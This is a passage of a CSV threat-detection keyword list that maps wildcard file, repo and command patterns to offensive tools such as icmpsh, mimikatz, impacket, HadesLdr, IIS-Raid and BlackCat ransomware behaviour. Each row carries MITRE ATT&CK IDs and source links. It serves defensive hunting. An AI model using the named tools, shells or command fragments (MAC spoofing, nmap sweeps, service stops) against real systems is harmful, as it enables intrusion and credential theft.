TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*icmpsh.exe*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh.git*","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" +"*icmpsh_m.py*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*icmpsh_m.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-m.*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*icmpsh-m.c*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-m.pl*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*icmpsh-master*","offensive_tool_keyword","icmpsh","Simple reverse ICMP shell","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","1","N/A","10","10","1475","424","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z" +"*icmpsh-s.*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*icmptunnel*","offensive_tool_keyword","icmptunnel","icmptunnel works by encapsulating your IP traffic in ICMP echo packets and sending them to your own proxy server. The proxy server decapsulates the packet and forwards the IP traffic. The incoming IP packets which are destined for the client are again encapsulated in ICMP reply packets and sent back to the client. The IP traffic is sent in the 'data' field of ICMP packets.","T1041 - T1001 - T1570","TA0011","N/A","N/A","Defense Evasion","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*icyguider/LightsOut*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" +"*id::modify*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*IDiagnosticProfileUAC.git*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" +"*IDiagnosticProfileUAC-main*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" +"*Idov31/Jormungandr*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" +"*idrac_default_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*idrac_default_user.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*IDSyscall.exe*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*IDSyscall.sln*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*IDSyscall.vcxproj*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*IDSyscall/IDSyscall*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*IDSyscall\IDSyscall*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*ie_execcommand_uaf.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ie_win_fakenotification-clippy*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_win_htapowershell.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ie_win_missingflash-prettytheft*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*IERMTCBpbnRvIHByb2Nlc3MgOiA=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*if [ -f /tmp/tmpwatch ] * then*","greyware_tool_keyword","tmpwatch","Equation Group hack tool set command exploitation- tmpwatch - removes files which haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","N/A","https://linux.die.net/man/8/tmpwatch","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*ifconfig * hw ether *","greyware_tool_keyword","ifconfig","change mac address with ifconfig","T1027","TA0002","N/A","N/A","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*ifconfig * hw ether *:*:*","greyware_tool_keyword","ifconfig","changing mac address with ifconfig","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A" +"*ifconfig -a | grep * | xargs nmap -*","greyware_tool_keyword","nmap","Nmap Scan Every Interface that is Assigned an IP address","T1018 - T1046","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*ifnaibldjfdmaipaddffmgcmekjhiloa*","greyware_tool_keyword","FREE VPN DEWELOPMENT","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*igahhbkcppaollcjeaaoapkijbnphfhb*","greyware_tool_keyword","Social VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*IIS-Backdoor.*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"*IIS-Raid-master*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"*iisreset.exe /stop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ikeforce.py*","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","1","N/A","N/A","3","226","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" +"*ikescan2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ILBypass.ps1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*imapattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*imapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*imaprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*imaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*imp_Badger*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-* *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-*.tar.gz*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*impacket.*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*'impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.git*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.ldap*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket.ntlm*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral 